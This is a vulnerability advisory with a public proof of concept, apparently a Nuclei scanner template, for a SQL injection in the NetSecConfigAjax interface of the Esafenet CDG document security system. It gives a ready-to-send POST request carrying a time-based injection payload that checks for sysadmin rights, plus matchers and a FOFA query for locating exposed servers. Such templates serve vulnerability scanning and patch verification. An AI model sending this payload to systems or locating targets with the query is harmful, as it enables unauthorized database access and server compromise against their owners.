The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
PoC代码[已公开]
id: esafenet-netsecconfigajax-sqli
info:
name: Esafenet CDG NetSecConfigAjax - Sql Injection
author: adeljck
severity: high
description: |
The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
classification:
cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: esafenet
product: cdg
fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
tags: esafenet,sqli,vuln
http:
- raw:
- |
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
matchers:
- type: dsl
dsl:
- 'contains(content_type,"text/html")'
- 'contains(body,"操作成功")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402206d6f5782a1caaf9eff08c24c49b8a7c498b7e9743c93f13eda7abedd158d50d80220077fefab1e6a941961622bbfec5251c4f8667346fc3f2a2c21125cad6a7c0620:922c64590222798bb761d5b6d8e72950